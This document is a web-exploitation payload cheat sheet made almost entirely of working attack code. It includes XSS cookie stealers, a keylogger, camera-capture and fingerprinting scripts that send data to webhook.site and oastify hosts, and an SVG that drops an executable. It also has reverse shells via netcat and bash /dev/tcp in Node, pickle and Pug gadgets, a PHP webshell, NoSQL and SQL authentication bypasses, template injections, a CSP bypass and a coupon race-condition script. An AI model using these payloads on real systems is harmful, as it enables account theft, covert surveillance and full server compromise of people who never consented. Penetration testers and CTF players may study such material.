WebSocket XSS Cookie Stealer (assumes the page already exposes a global `socket` WebSocket; only non-HttpOnly cookies are readable via `document.cookie`)
<img src="x" onerror="socket.send(document.cookie)">
Chromium tab Crash CSS
<iframe style="background:conic-gradient(in rec2020,red,red)">
Keylogger XSS with history.replaceState
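<img src onerror='
  // Disguise the address bar; replaceState does not navigate, so this document
  // (and the handler below) keeps running.
  history.replaceState(null, null, "../../../login");
  let buffer = "";
  // keypress only fires for printable characters (deprecated, but still the
  // simplest way to get the typed character as a code).
  document.onkeypress = function (e) {
    buffer += String.fromCharCode(e.which);
    if (buffer.length >= 25) {
      // Encode the batch: a typed "&", "#", "+" or space would otherwise
      // truncate or corrupt the query string on the receiving side.
      fetch("https://webhook.site/{webhook-id}/?k=" + encodeURIComponent(buffer));
      buffer = "";
    }
  };
  // remove the broken image so nothing visible remains
  this.remove();
'></img>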
AngularJS CSTI
{{$on.constructor('alert(1)')()}}
SVG Malware Smuggler
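<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" width="500" height="500">
  <!-- Browsers do not execute scripts in an SVG rendered through an img element;
       the file has to be opened directly (new tab / navigation) for the download
       to be triggered, hence the prompt text below. -->
  <text x="10" y="50" font-family="Arial" font-size="20" fill="black">Open this image in a new tab</text>
  <script type="application/ecmascript"><![CDATA[
    document.addEventListener("DOMContentLoaded", function () {
      // Decode a base64 string into the raw bytes it encodes.
      function base64ToArrayBuffer(base64) {
        var binaryString = window.atob(base64);
        var bytes = new Uint8Array(binaryString.length);
        for (var i = 0; i < binaryString.length; i++) {
          bytes[i] = binaryString.charCodeAt(i);
        }
        return bytes.buffer;
      }
      var file = 'U2FtcGxlIGZpbGUgYnkgaWFu'; // base64 encoded payload ("Sample file by ian"); replace with the real binary
      var data = base64ToArrayBuffer(file);
      // 'application/octet-stream' is the registered generic binary type
      // ('octet/stream' in the original is not a valid MIME type)
      var blob = new Blob([data], { type: 'application/octet-stream' });
      // an XHTML anchor is needed so that .download and .click() work inside the SVG document
      var a = document.createElementNS('http://www.w3.org/1999/xhtml', 'a');
      document.documentElement.appendChild(a);
      a.setAttribute('style', 'display: none');
      var url = window.URL.createObjectURL(blob);
      a.href = url;
      a.download = 'sample.exe'; // filename offered in the download prompt
      a.click();
      window.URL.revokeObjectURL(url);
    });
  ]]></script>
</svg>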
XSS Leak Browser information
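document.addEventListener('DOMContentLoaded', async () => {
  // The Battery Status API is Chromium-only (Firefox and Safari dropped it);
  // without this guard the await throws and nothing at all is sent.
  let battery = null;
  try {
    battery = await navigator.getBattery();
  } catch {
    // leave battery null; the remaining fields are still worth collecting
  }
  const gl = document.createElement('canvas').getContext('webgl');
  const debugInfo = gl?.getExtension('WEBGL_debug_renderer_info');
  const tzid = Intl.DateTimeFormat().resolvedOptions().timeZone;
  fetch('https://webhook.site/{webhook_id}/', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({
      language: navigator.language,
      charging: battery?.charging ?? null,
      battery: battery ? battery.level * 100 : null,
      ram: navigator.deviceMemory ?? null, // Chromium-only; null elsewhere
      timezone: tzid,
      webgl: debugInfo
        ? `Vendor: ${gl.getParameter(debugInfo.UNMASKED_VENDOR_WEBGL)}, Renderer: ${gl.getParameter(debugInfo.UNMASKED_RENDERER_WEBGL)}`
        : 'WebGL not supported',
    }),
  }).catch(() => {}); // exfiltration is best-effort; a failed request must not surface to the victim
});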
Leverage XSS to Capture Photos and Videos
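<script>
// Needs a secure context (HTTPS) and camera permission for the origin; unless it
// was granted earlier the browser prompts and shows the recording indicator, so
// this is not silent.
const v = document.createElement('video');
const c = document.createElement('canvas');
navigator.mediaDevices?.getUserMedia({ video: true })
  .then((s) => {
    v.srcObject = s;
    // register the handler before play() so the first frame is never missed
    v.onloadeddata = () => setTimeout(() => {
      c.width = v.videoWidth;
      c.height = v.videoHeight;
      c.getContext('2d').drawImage(v, 0, 0);
      fetch('https://webhook.site/{webhook-id}/', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({
          image: c.toDataURL('image/jpeg'),
          timestamp: new Date().toISOString(),
        }),
      }).catch(() => {}); // best-effort exfiltration
      // release the camera (turns the indicator off)
      s.getTracks().forEach((t) => t.stop());
    }, 1000); // short delay so auto-exposure settles and the frame is not black
    // play() returns a promise; a rejection (autoplay policy) is otherwise an unhandled error
    v.play().catch(() => {});
  })
  .catch(() => alert('Camera access error')); // note: this alert reveals the attempt to the victim
</script>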
Prepared Statement Bypass NodeJS MySQL — relies on client-side `?` substitution in the `mysql`/`mysql2` `query()` API, which serialises an object value as `` `key` = value ``, so the check becomes `password = `password` = 1` (always true); real server-side prepared statements (`mysql2` `execute()`) are not affected
{"username": "admin", "password": {"password": 1}}
username=admin&password[password]=1
Race Condition on coupons -> purchase endpoint
import httpx
import asyncio
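url = "http://example.com"


async def apply_coupon(session, client=None):
    """Apply the coupon once with the given cookie jar.

    Args:
        session: httpx.Cookies holding the target session; updated in place with
            any cookies the server sets.
        client: optional shared httpx.AsyncClient. Sharing one connection pool keeps
            the concurrent requests close together in time; a fresh client per call
            adds TCP/TLS setup that spreads them out and narrows the race window.
    """
    async def _apply(c):
        response = await c.post(url + "/api/coupons/apply", json={"coupon_code": "SUMMER_2024"}, cookies=session)
        session.update(response.cookies)

    if client is not None:
        await _apply(client)
    else:
        async with httpx.AsyncClient() as c:
            await _apply(c)


async def main():
    """Reset the account, buy once, fire the coupon requests concurrently, buy again."""
    async with httpx.AsyncClient() as client:
        session = (await client.get(url + '/api/reset')).cookies
        # the client's own jar already carries the reset session cookies
        response = await client.post(url + "/api/purchase", json={"item": "BEER"})
        session.update(response.cookies)
        # 20 concurrent applications from one pool (the original range(1, 20) sent 19)
        await asyncio.gather(*(apply_coupon(session, client) for _ in range(20)))
        response = await client.post(url + "/api/purchase", json={"item": "BEER"}, cookies=session)
        print(response.json().get('flag'))


asyncio.run(main())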
XSS to Steal Secrets from (admin) pages
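<script>
// Works only when the secret is same-origin with the page where the XSS fires
// (or is served with a permissive CORS policy): for a cross-origin target without
// CORS headers the first fetch rejects and nothing is read.
fetch("http://localhost:1337/admin-secret.txt")
  .then((r) => r.text())
  // Send the body as a POST instead of btoa() in the URL: btoa throws on any
  // non-Latin-1 character and long secrets would exceed URL length limits.
  .then((d) => fetch("https://webhook.site/webhook-id/", { method: "POST", mode: "no-cors", body: d }))
  .catch(() => {}); // best-effort exfiltration
</script>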
NoSQL injection — MongoDB query-operator injection: a login that passes the parsed JSON body straight into the query matches any document, since `$ne: null` is true for every stored username/password
{"username": {"$ne": null}, "password": {"$ne": null} }
Node eval RCE
// nc -e needs a netcat build that supports -e (traditional netcat / ncat); OpenBSD nc does not
require('child_process').exec('sh -c "nc 192.168.1.2 9001 -e sh"')
Stealing Cookies with fetch
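<!-- The options object must be the second argument of fetch() (the original closed the
     call early), and the mode is the lowercase enum value 'no-cors' — 'no-CORS' makes
     fetch throw a TypeError. The useless "javascript:" label is dropped. -->
<img src=x onerror="fetch('https://webhook.site/{id}',{method:'POST',mode:'no-cors',body:document.cookie})">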
Stealing Cookies
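<!-- encode the cookie string: a "#", "&" or "+" in a cookie value would otherwise truncate or corrupt the query -->
<img src=x onerror=this.src="https://webhook.site/?c="+encodeURIComponent(document.cookie)>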
PHP webshell cmd
<?php /* minimal webshell: ?cmd=<command> (URL-encode it) runs as the web server user and its output is echoed; the "Shell" echo confirms the file is being executed and not served as text */ echo "Shell";system($_GET['cmd']); ?>
Stealing Cookies less known way — `navigator.sendBeacon` sends a fire-and-forget POST that is delivered even while the page is unloading, and it does not need a `<img>` or `fetch`
javascript:navigator.sendBeacon('https://webhook.site/{webhook-id}/?c='+document.cookie)
Python Pickle Deserialization
import pickle
import base64
import os
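class Exploit:
    """Pickle gadget: unpickling calls ``os.system(cmd)``, so ``pickle.loads`` alone executes it.

    ``nc -e`` needs a netcat build that supports ``-e`` (traditional netcat / ncat);
    set ``cmd`` to whatever your listener expects.
    """

    cmd = 'nc 192.168.2.177 9001 -e sh'

    def __reduce__(self):
        # pickle stores (callable, args) and re-invokes the callable on load
        return (os.system, (self.cmd,))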
# Serialise the gadget and base64 it so it can be pasted into a cookie or form field.
raw = pickle.dumps(Exploit())
payload = base64.b64encode(raw).decode('ascii')
print(payload)
XSS in SVG
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<!-- Useful where an upload accepts SVG and serves it back as image/svg+xml on the
     application's origin. The script runs when the SVG is opened directly
     (navigation, object/embed/iframe), not when it is displayed through an img element. -->
<script type="text/javascript">
alert(1);
</script>
</svg>
Prototype Pollution RCE in Pug
"__proto__.block": {
"type": "Text",
"line": "process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/IP/PORT 0>&1\"')"
}
JsDelivr CSP Bypass — works when the policy's `script-src` allows cdn.jsdelivr.net, since the `/gh/` path serves any file from any GitHub repository; keep the commit hash pinned as here so the loaded script cannot change underneath you
<script src="https://cdn.jsdelivr.net/gh/Vagebondcur/xss-jsdeliver@d96b9d94f1eea5d719d020b350e3fe111d796723/exploit.js"></script>
PUG SSTI to RCE
//- Pug SSTI to RCE: every #{...} below is evaluated server-side when the template renders.
//- Grabs Node's internal spawn_sync binding through process.binding(), which is
//- deprecated (DEP0111) — confirm it is still reachable on the target's Node version.
#{spawn_sync = this.process.binding('spawn_sync')}
//- Re-implementation of child_process' argument normalisation (file/args/env pairs).
#{normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(' ');typeof a.shell==='string'?c=a.shell:c='/bin/sh',b=['-c',g];}typeof a.argv0==='string'?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+'='+d[f]);return{file:c,args:b,options:a,envPairs:e};}}
//- Re-implementation of spawnSync on top of the raw binding. `util._extend` and
//- `isUint8Array` are only reached on the `input` path, which the call below does not take.
#{spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:'pipe',readable:!0,writable:!1},{type:'pipe',readable:!1,writable:!0},{type:'pipe',readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0]);g.input=a.input;} for(c=0;c<a.stdio.length;c++){var e=a.stdio[c] && a.stdio[c].input;if(e!=null){var f=a.stdio[c] = util._extend({},a.stdio[c]);isUint8Array(e) ? f.input=e : f.input=Buffer.from(e,a.encoding);}} console.log(a); var b=spawn_sync.spawn(a); if(b.output && a.encoding && a.encoding!=='buffer') for(c=0;c<b.output.length;c++){ if(!b.output[c]) continue; b.output[c]=b.output[c].toString(a.encoding); } return b.stdout=b.output && b.output[1], b.stderr=b.output && b.output[2], b.error&&(b.error= b.error + 'spawnSync '+d.file,b.error.path=d.file,b.error.spawnargs=d.args.slice(1)), b;}}
//- base64 of: bash -i >& /dev/tcp/10.9.0.40/8080 0>&1 — replace with your own listener.
#{payload='YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC45LjAuNDAvODA4MCAwPiYx'}
//- `new Buffer()` is deprecated; Buffer.from(payload, 'base64') is the modern equivalent.
#{resp=spawnSync('bash',['-c',(new Buffer(payload, 'base64')).toString('ascii')])}
Vue.js V2 CSTI
{{constructor.constructor('alert(1)')()}}
Vue.js V3 CSTI
{{_openBlock.constructor('alert(1)')()}}
XSS in CDATA steal Login Credentials
<![CDATA[<]]><img src="x" onerror="var credentials=prompt('Please insert username and password separated by a colon (e.g., username:password):'); if(credentials) { var img=new Image(); img.src='https://ujhhrlvlfyivfk73njj018g7tyzpngb5.oastify.com?credentials=' + encodeURIComponent(credentials); document.body.appendChild(img); }"/><![CDATA[>]]>alert(1)<![CDATA[<]]>/script<![CDATA[>]]>